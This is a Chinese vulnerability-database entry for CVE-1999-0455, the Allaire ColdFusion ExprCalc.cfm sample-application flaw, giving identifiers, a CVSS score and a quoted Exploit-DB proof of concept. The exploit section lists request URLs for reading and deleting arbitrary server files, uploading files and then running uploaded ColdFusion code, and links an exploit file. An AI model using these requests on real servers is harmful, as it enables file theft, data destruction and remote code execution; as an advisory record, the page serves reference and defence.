Allaire ColdFusion远程文件的显示,删除,上传和执行漏洞

Allaire ColdFusion远程文件的显示,删除,上传和执行漏洞

漏洞ID 1105389 漏洞类型 其他
发布时间 1998-12-25 更新时间 2005-10-20
图片[1]-Allaire ColdFusion远程文件的显示,删除,上传和执行漏洞-安全小百科CVE编号 CVE-1999-0455
图片[2]-Allaire ColdFusion远程文件的显示,删除,上传和执行漏洞-安全小百科CNNVD-ID CNNVD-199912-084
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-084
|漏洞详情
ColdFusion中的表达式计算器示例应用程序存在漏洞,远程攻击者利用该漏洞通过exprcalc.cfm读取或删除服务器上的文件。exprcalc.cfm可以正确的无限制的访问服务器的。
|漏洞EXP
source: http://www.securityfocus.com/bid/115/info

To display and delete any file on the system use an URL of the following form:

http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:thetargetfile

To upload files to the sever first find out the location of the sample code on the server by uploading a dummy file by using http://www.victim.test/cfdocs/expeval/openfile.cfm. After uploading a dummy file it will be displayed for you. The URL will be for the form:

http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:Inetpubwwwrootcfdocsexpeval.dummy.txt

Now replace the "dummy.txt" string by "ExprCalc.cfm" to delete that file. We can now upload and execute ColdFusion files in the server without them being deleted.

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19093.cfm
|参考资料

来源:BID
名称:115
链接:http://www.securityfocus.com/bid/115

相关推荐: News Evolution包含未定义变量命令执行漏洞

News Evolution包含未定义变量命令执行漏洞 漏洞ID 1107114 漏洞类型 代码注入 发布时间 2002-11-26 更新时间 2002-12-31 CVE编号 CVE-2002-2249 CNNVD-ID CNNVD-200212-564 漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享